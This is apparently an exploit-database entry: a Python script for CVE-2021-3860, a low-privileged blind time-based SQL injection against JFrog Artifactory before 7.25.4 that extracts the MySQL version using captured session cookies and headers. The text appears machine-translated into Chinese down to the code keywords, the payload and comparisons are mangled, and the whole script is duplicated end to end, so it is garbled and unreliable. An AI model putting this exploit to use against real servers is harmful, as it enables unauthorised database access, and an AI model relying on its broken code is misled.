#利用title:伪像的低特性盲目SQL注入
#Google Dork:
#日期:
#利用作者: ardr
#供应商HomePage:https://jfrog.com/help/r/jfrog-rele...factory-low-prow-provile--provile------------
#软件link: https://jfrog.com/help/r/jfrog-rele...rtifactory-low-privileged-blind-blind-sql-sql
#版本: 7.25.4之前的JFrog伪影
#测试在: mysql
#CVE : CVE-2021-3860
导入请求,字符串,时间
从系统导入Stdout,退出
进口警告
从requests.packages.urllib3.ceptions导入InsecureRequestWarning
#写75FC58FA867784617771D2FF7F68B28259E9E9BF6CD8BE227C70E6A6140314 C97D3FDAC30B290C6B10D3679C5BA890635A1CA6FA23C83481DFC1257CD062FD
#CVE-2021-3860的旧脚本
#与任何用户一起登录文法。系统中必须有填充的数据。新的安装将不起作用。
#您将需要能够捕获有效的请求到下面的端点,以便运行此脚本。
#捕获后,更换下面的饼干和标题
警告。Simplefilter(“忽略”,InsecureReRequestWarning)
session=requests.session()
base=输入('请输入基本URL:')
url=f'{base}/ui/api/v1/global-search/bundles/endere?$ no_spinner=true'
#标头=从上面的端点替换为捕获的标头
POS=1
#cookies=用上面的端点捕获的cookie代替它
而true:
for in String.digits +'.':
data={'after':'',':'',''方向:'asc','name':'*','num_of_rows': 100,'order_bord_by_by': f' 4616 end))))a)'}
start=time.time()
r=session.post(url,headers=标题,cookies=cookie,json=data,verify=false)
request_time=time.time() - 开始
如果request_time 5:
版本+=i
POS +=1
stdout.write(i)
stdout.flush()
休息
如果Len(版本)=6:
stdout.write('\ n')
打印(f'version找到: mysql {version}')
出口(0)
#Google Dork:
#日期:
#利用作者: ardr
#供应商HomePage:https://jfrog.com/help/r/jfrog-rele...factory-low-prow-provile--provile------------
#软件link: https://jfrog.com/help/r/jfrog-rele...rtifactory-low-privileged-blind-blind-sql-sql
#版本: 7.25.4之前的JFrog伪影
#测试在: mysql
#CVE : CVE-2021-3860
导入请求,字符串,时间
从系统导入Stdout,退出
进口警告
从requests.packages.urllib3.ceptions导入InsecureRequestWarning
#写75FC58FA867784617771D2FF7F68B28259E9E9BF6CD8BE227C70E6A6140314 C97D3FDAC30B290C6B10D3679C5BA890635A1CA6FA23C83481DFC1257CD062FD
#CVE-2021-3860的旧脚本
#与任何用户一起登录文法。系统中必须有填充的数据。新的安装将不起作用。
#您将需要能够捕获有效的请求到下面的端点,以便运行此脚本。
#捕获后,更换下面的饼干和标题
警告。Simplefilter(“忽略”,InsecureReRequestWarning)
session=requests.session()
base=输入('请输入基本URL:')
url=f'{base}/ui/api/v1/global-search/bundles/endere?$ no_spinner=true'
#标头=从上面的端点替换为捕获的标头
POS=1
#cookies=用上面的端点捕获的cookie代替它
而true:
for in String.digits +'.':
data={'after':'',':'',''方向:'asc','name':'*','num_of_rows': 100,'order_bord_by_by': f' 4616 end))))a)'}
start=time.time()
r=session.post(url,headers=标题,cookies=cookie,json=data,verify=false)
request_time=time.time() - 开始
如果request_time 5:
版本+=i
POS +=1
stdout.write(i)
stdout.flush()
休息
如果Len(版本)=6:
stdout.write('\ n')
打印(f'version找到: mysql {version}')
出口(0)